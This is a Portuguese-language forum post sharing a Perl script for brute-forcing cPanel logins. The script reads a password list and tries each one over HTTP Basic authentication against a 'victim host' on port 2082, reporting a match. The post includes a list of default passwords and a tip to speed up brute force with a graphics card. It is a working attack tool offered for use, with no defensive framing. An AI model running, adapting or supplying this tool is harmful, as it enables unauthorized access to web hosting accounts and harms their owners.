Tweet
Bom, andei procurando por metodos de Burlar o C-panel, cheguei ao ponto de pedir ajuda no chat, mas dessisti, quando lembrei Poxa existem outros metotdos, então o cryptosystem me deu uma ajuda motivacional hehehe Valeu, e achei esse exploit que faz um Brute-Force em C-Panel.
Oque vc vai presisar é do arquivo passlist.txt com as seguintes senhas padrões:
OBs: Se quiser adcionar mais fica a seu critério.
do Cp.pl (exploit):
no Mais bom Brute Force!
Há uma dica, esperimente usar o esquema de placa de video para o uso de Brute-Force, almenta a velocidade!!!
Oque vc vai presisar é do arquivo passlist.txt com as seguintes senhas padrões:
OBs: Se quiser adcionar mais fica a seu critério.
Código:
admin administrator ADMIN ADMINISTRATOR Hello hello Admin Administrator test TEST Test TeST TesT tEST teST tesT enjoy 123456 123456789 12345 123123 69696969 12345678 1234567 hacekd hack fire welcome Welcome meandu
Código:
#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;
$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
# Cpanel Password Brute Force Tool #
###############################################################
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
###############################################################
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);exit;}
headx();
$numstart = "-1";
sub headx() {
print q(
###############################################################
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "password.txt
[~] Try Password : $passwd
";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "
[-] Can not connect to the host";
print $sock "GET / HTTP/1.1
";
print $sock "Authorization: Basic $authx
";
print $sock "Connection: Close
";
read $sock, $answer, 128;
close($sock);
if ($answer =~ /Moved/) {
print "
[~] PASSWORD FOUND : $passwd
";
exit();
}
}
Há uma dica, esperimente usar o esquema de placa de video para o uso de Brute-Force, almenta a velocidade!!!
Comment